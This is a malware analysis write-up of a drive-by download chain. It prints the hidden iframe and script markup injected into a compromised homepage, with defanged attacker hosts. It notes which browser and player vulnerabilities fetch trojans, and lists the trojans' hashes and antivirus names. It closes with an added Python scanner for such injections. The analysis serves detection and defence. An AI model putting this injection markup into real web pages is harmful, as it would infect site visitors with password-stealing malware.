Trojans Rootkit.Win32.Mnless, Trojan.Win32.Edog, etc.
Endurer, original
2008-02-02, version 1
IE stopped responding after opening the website...
Code found at the bottom of the homepage:
/---
<IFRAME src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0></iframe>
---/
1 hxxp://8**8.8*812**15.com/88.htm
Code included:
/---
<IFRAME src="hxxp://8***8.8*812***15.com/in.htm" width=0 height=0></iframe>
<IFRAME src="hxxp://ga**.mm*52**08.com/20.htm" width=0 height=0></iframe>
<IFRAME src="hxxp://d**v.5**51*89.net/" width=0 height=0></iframe>
<IFRAME src="hxxp://a*1**.sb**b2*2.com/a.htm" width=0 height=0></iframe>
<IFRAME src="hxxp://s*f*.07**08*08.net/sf.htm" width=0 height=0></iframe>
---/
1.1 hxxp://8**8.8*812**15.com/in.htm
Code included:
/---
<IFRAME src="hxxp://y**un.y**un8**78.com/web/6620.38.htm" width=100 height=0></iframe>
---/
1.1.1 hxxp://y**un.y**un8**78.com/web/6620.38.htm
Code included:
/---
<IFRAME src=htm.html width=100 height=0></iframe>
---/
1.1.1.1 hxxp://y**un.y**un8**78.com/web/htm.html
Output code:
/---
<SCRIPT src=hxxp://y**un.y**un8**78.com/web/1.js></SCRIPT>
<SCRIPT src=hxxp://y**un.y**un8**78.com/web/bf.js></SCRIPT>
<SCRIPT src=hxxp://y**un.y**un8**78.com/web/pps.js></SCRIPT>
<IFRAME width='10' height='10' src='hxxp://y**un.y**un8**78.com/web/3.htm'></iframe>
<SCRIPT src=hxxp://y**un.y**un8**78.com/web/pps.js></SCRIPT>
<IFRAME width='000000' height='0' src='hxxp://y**un.y**un8**78.com/web/2.htm'></iframe>
<IFRAME width=100 height=0 src=hxxp://y**un.y**un8**78.com/web/0.htm></iframe>
---/
1.1.1.1.1 hxxp://y**un.y**un8**78.com/web/1.js
Downloads hxxp://y**un.y**un8**78.com/14.exe using the MS06-014 critical vulnerability (msadco.dll)
File: D:/test/14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 17:15:21
Size: 9728 bytes, 9.512 KB
MD5: b64fac1da0efbbc479486fefa269cf39
Sha1: 35e62825704027baa6dc0d7089857d10986fbd71
CRC32: 8e086454
Kaspersky: Trojan-PSW.Win32.OnLineGames.pik; Rising: Trojan.DL.Win32.Undef.w
1.1.1.1.2 hxxp://y**un.y**un8**78.com/web/bf.js
Downloads hxxp://y**un.y**un8**78.com/bf.exe using the Baofeng Storm Player vulnerability
File: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:15:57
Modification time: 17:15:57
Access time: 17:16:24
Size: 23886 bytes, 23.334 KB
MD5: a20a230c7e2e1f93bc659aa9fa1ed3d1
Sha1: 8fe260c3a6a971d339b2ea170283c13f4faade87
CRC32: 13eb41fd
Kaspersky: Trojan-PSW.Win32.OnLineGames.ode; Rising: Trojan.DL.Win32.Undef.w, Rootkit.Win32.Mnless.gp
1.1.1.1.3 hxxp://y**un.y**un8**78.com/web/pps.js
Uses the PPStream vulnerability to download hxxp://y**un.y**un8**78.com/pps.exe
pps.exe is the same as bf.exe.
1.1.1.1.4 Uses the BaiduBar toolbar vulnerability to download hxxp://y**un.y**un8**78.com/ad.cab
ad.cab contains bd.exe.
bd.exe is the same as bf.exe.
1.1.1.1.5 hxxp://y**un.y**un8**78.com/web/3.htm
Downloads hxxp://y**un.y**un8**78.com/g.exe using the Lianzhong (GLWorld) GLChat.ocx vulnerability
g.exe is the same as bf.exe.
1.1.1.1.6 hxxp://y**un.y**un8**78.com/web/2.htm
RealPlayer exploit code; one of its lines is: payload += "yuange";
1.1.1.1.7 hxxp://y**un.y**un8**78.com/web/0.htm
Uses the QvodPlayer vulnerability to download hxxp://y**un.y**un8**78.com/me.exe
me.exe is the same as bf.exe.
1.2 hxxp://ga**.mm*52**08.com/20.htm
Code included:
/---
<IFRAME src="hxxp://3**75*86.com/uu/web.htm" width=100 height=0></iframe>
---/
1.2.1 hxxp://3***75*86.com/uu/web.htm
Code included:
/---
<IFRAME src=r.htm width=10 height=0></iframe>
<IFRAME src=index.htm width=10 height=0></iframe>
---/
1.2.1.1 hxxp://3**75*86.com/uu/r.htm
RealPlayer exploit code; one of its lines is: xcbfcxn += "Lizhen";
1.2.1.2 hxxp://3**75*86.com/uu/index.htm
Output code:
/---
<IFRAME src=06014.html></iframe>
<SCRIPT src=bf.gif></SCRIPT>
<SCRIPT src=pps.gif></SCRIPT>
<SCRIPT src=lz.gif></SCRIPT>
---/
1.2.1.2.1 hxxp://3***75*86.com/uu/06014.html
Downloads hxxp://3**75*86.com/uu/uuu.exe using the MS06-014 critical vulnerability (msadco.dll) and saves it as quit.exe
File: D:/test/uuu.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:27:20
Modification time: 17:27:20
Access time: 17:27:30
Size: 19476 bytes, 19.20 KB
MD5: 9eaf1e6e1986170ffdcfae05852f5d0e
Sha1: 4b55206aab215f1e09e9442988da5b7c61716fa9
CRC32: 3177b317
1.2.1.2.2 hxxp://3**75*86.com/uu/bf.gif
Downloads hxxp://3**75*86.com/uu/uuu.exe using the Baofeng Storm Player vulnerability
1.2.1.2.3 hxxp://3**75*86.com/uu/lz.gif
Downloads hxxp://3**75*86.com/uu/uuu.exe using the Lianzhong (GLWorld) GLChat.ocx vulnerability
1.2.1.2.4 hxxp://3***75*86.com/uu/pps.gif
Uses the PPStream vulnerability to download hxxp://3**75*86.com/uuu/uuu.exe
1.3 hxxp://d**v.5**51*89.net/
Code included:
/---
<IFRAME src="hxxp://ppp.bu*ya**oni**.com/ww/new82.htm" width=1 height=1></iframe>
---/
1.3.1 hxxp://ppp.bu*ya**oni**.com/ww/new82.htm
Code included:
/---
<IFRAME src=hxxp://ppp.bu*ya**oni**.com/dm/diao.htm width=1 height=1></iframe>
<IFRAME src=hxxp://ppp.bu*ya**oni**.com/dm/rl.htm width=1 height=1></iframe>
<IFRAME src=hxxp://ppp.bu*ya**oni**.com/dm/rr.htm width=1 height=1></iframe>
---/
1.3.1.1 hxxp://ppp.bu*ya**oni**.com/dm/diao.htm
Output code:
/---
<SCRIPT src=hxxp://ppp.bu*ya**oni**.com/dm/11.js></SCRIPT>
<SCRIPT src=hxxp://ppp.bu*ya**oni**.com/dm/BB.js></SCRIPT>
<SCRIPT src=hxxp://ppp.bu*ya**oni**.com/dm/pp.js></SCRIPT>
<SCRIPT src=hxxp://ppp.bu*ya**oni**.com/dm/pp.js></SCRIPT>
---/
1.3.1.1.1 hxxp://ppp.bu*ya**oni**.com/dm/11.js
Downloads hxxp://dd.749571.com/bb/014.exe using the MS06-014 critical vulnerability (msadco.dll) and saves it as ntuser.com
File: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 12272 bytes, 11.1008 KB
MD5: f12f5cb120648999c40ef8a617efd8da
Sha1: 881d4cf70f5a9a77df37438c826e00fc3fc619d6
CRC32: f6a07465
Kaspersky: Trojan-Downloader.Win32.Agent.ine; Rising: Trojan.DL.Win32.Mnless.xr
1.3.1.1.2 hxxp://ppp.bu*ya**oni**.com/dm/BB.js
Downloads hxxp://dd.749571.com/bb/bb.exe
bb.exe is the same as 014.exe.
1.3.1.1.3 hxxp://ppp.bu*ya**oni**.com/dm/pp.js
Uses the PPStream vulnerability to download hxxp://dd.749571.com/bb/pp.exe
pp.exe is the same as 014.exe.
1.3.1.1.4 Uses the BaiduBar toolbar vulnerability to download hxxp://dd.749571.com/bb/bd.cab
Contains: bd.exe
bd.exe is the same as 014.exe.
1.3.1.2 hxxp://ppp.bu*ya**oni**.com/dm/rl.htm
RealPlayer exploit code; one of its lines is: xcbfcxn += "Lizhen";
1.3.1.3 hxxp://ppp.bu*ya**oni**.com/dm/rr.htm
Downloads hxxp://is.749571.com/bb/a.exe using the Lianzhong (GLWorld) GLChat.ocx vulnerability.
a.exe could not be downloaded.
1.4 hxxp://a*1**.sb**b2*2.com/a.htm
Code included:
/---
<IFRAME src="hxxp://xxx.j**sp**p*p.us/dgll1.htm?Id=TT" width=100 height=0></iframe>
---/
1.4.1 hxxp://xxx.j**sp**p*p.us/dgll1.htm?Id=TT
Output code:
/---
<IFRAME width=100 height=1 frameborder=0 scrolling=no src="Ceshi/real.htm"></iframe>
<IFRAME width=100 height=1 frameborder=0 scrolling=no src="Ceshi/lz.htm"></iframe>
<IFRAME width=100 height=1 frameborder=0 scrolling=no src="Ceshi/614.htm"></iframe>
---/
1.4.1.1 hxxp://xxx.j**sp**p*p.us/Ceshi/real.htm
RealPlayer exploit code; one of its lines is: xcbfcxn += "Lizhen";
1.4.1.2 hxxp://xxx.j**sp**p*p.us/Ceshi/lz.htm
Downloads hxxp://xxx.j**sp**p*p.us/ww/dod.exe using US-ASCII-encoded code that exploits the Lianzhong (GLWorld) GLChat.ocx vulnerability
File: D:/test/dod.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:39:25
Modification time: 17:39:25
Access time: 17:39:38
Size: 12248 bytes, 11.984 KB
MD5: d7da77be93072171fa1e6778655e37da
Sha1: 74ea3b71ab6953a231e914b3592ded61de4c198b
CRC32: ca260cda
Kaspersky: Trojan-Downloader.Win32.Agent.iga; Rising: Trojan.DL.Win32.Mnless.xr
1.4.1.3 hxxp://xxx.j**sp**p*p.us/Ceshi/614.htm
Downloads hxxp://xxx.j**sp**p.us/ww/dod.exe using the MS06-014 critical vulnerability (msadco.dll)
1.5 hxxp://s*f*.07**08*08.net/sf.htm
Code included:
/---
<IFRAME src="hxxp://xxx.a**omi*ba**.com/index888.htm?F8?001" width=0 height=0></iframe>
---/
1.5.1 hxxp://xxx.a**omi*ba**.com/index888.htm?F8?001
Output code:
/---
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/ajax.gif></SCRIPT>
<IFRAME width='0' height='0' src='hxxp://xxx.a**omi*ba**.com/ms06014.htm'></iframe>
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/real.js></SCRIPT>
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/bfyy.gif></SCRIPT>
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/pps.gif></SCRIPT>
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/xunlei.gif></SCRIPT>
<SCRIPT src=hxxp://xxx.a**omi*ba**.com/lz.gif></SCRIPT>
<IFRAME width='0' height='0' src='hxxp://xxx.a**omi*ba**.com/qvod.html'></iframe>
---/
1.5.1.1 hxxp://xxx.a**omi*ba**.com/ajax.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe using the MS06-014 critical vulnerability (msadco.dll)
File: D:/test/xxx.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:43:58
Modification time: 17:43:59
Access time:
Size: 12288 bytes, 12.0 KB
MD5: ebea634c297a18c2ff5dbc72841e178a
Sha1: cc2a9a901dc5b2f3e513e2370d008defb00f094a
CRC32: 252b48da
Kaspersky: Trojan-PSW.Win32.OnLineGames.qgh; Rising: Trojan.Win32.Edog.j
1.5.1.2 hxxp://xxx.a**omi*ba**.com/ms06014.htm
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe using the MS06-014 critical vulnerability (msadco.dll)
1.5.1.3 hxxp://xxx.a**omi*ba**.com/real.js
Uses the RealPlayer vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe
1.5.1.4 hxxp://xxx.a**omi*ba**.com/bfyy.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe
1.5.1.5 hxxp://xxx.a**omi*ba**.com/pps.gif
Uses the PPStream vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe
1.5.1.6 hxxp://xxx.a**omi*ba**.com/xunlei.gif
Uses the Xunlei (Thunder) vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe
1.5.1.7 hxxp://xxx.a**omi*ba**.com/lz.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe using the Lianzhong (GLWorld) GLChat.ocx vulnerability.
1.5.1.8 hxxp://xxx.a**omi*ba**.com/qvod.html
Uses the QvodPlayer vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe
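As an added defender-side example (not code from the original write-up), the following Python scanner flags the two markup tricks the whole chain above relies on: iframes sized to be invisible (width/height of 0, '000000', 1 or 10 pixels) and <script src> tags that load "images" such as bf.gif, pps.gif and lz.gif. The sample HTML, the .invalid placeholder hosts and the 10-pixel threshold are constructed assumptions for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page for this example, modelled on the injected markup
# in the chain above (placeholder .invalid hosts, not the write-up's domains).
SAMPLE_HTML = """
<html><body><p>Welcome</p>
<IFRAME src="http://bad.example.invalid/88.htm" width=0 Height=0></iframe>
<IFRAME width='10' Height='10' src='http://bad.example.invalid/web/3.htm'></iframe>
<IFRAME width='000000' Height='0' src='http://bad.example.invalid/web/2.htm'></iframe>
<SCRIPT src=http://bad.example.invalid/uu/bf.gif></SCRIPT>
<script src="/static/app.js"></script>
<iframe src="http://video.example.invalid/embed" width=640 height=360></iframe>
</body></html>
"""

TINY_PX = 10  # assumed threshold: an iframe at most this wide or high is "hidden"

class DriveByScanner(HTMLParser):
    """Flag (a) iframes sized to be invisible and (b) <script src> pointing at
    a file with an image/text extension, the two tricks this chain relies on."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, src) tuples

    @staticmethod
    def _px(value):
        # "0", "000000", "10px" -> 0, 0, 10; None when the value is not numeric
        m = re.match(r"\s*(\d+)", value or "")
        return int(m.group(1)) if m else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # HTMLParser lowercases names
        src = a.get("src", "")
        if tag == "iframe":
            w, h = self._px(a.get("width")), self._px(a.get("height"))
            if w is not None and h is not None and min(w, h) <= TINY_PX:
                self.findings.append(("hidden-iframe", src))
        elif tag == "script" and src:
            path = src.split("?", 1)[0].lower()  # ignore query strings
            if re.search(r"\.(gif|jpe?g|png|bmp|txt)$", path):
                self.findings.append(("script-from-image", src))

def scan(html):
    """Return the suspicious tags found in an HTML document, in page order."""
    p = DriveByScanner()
    p.feed(html)
    return p.findings
```

Running scan(SAMPLE_HTML) reports the three hidden iframes and the .gif script while leaving the normal video embed and app.js alone.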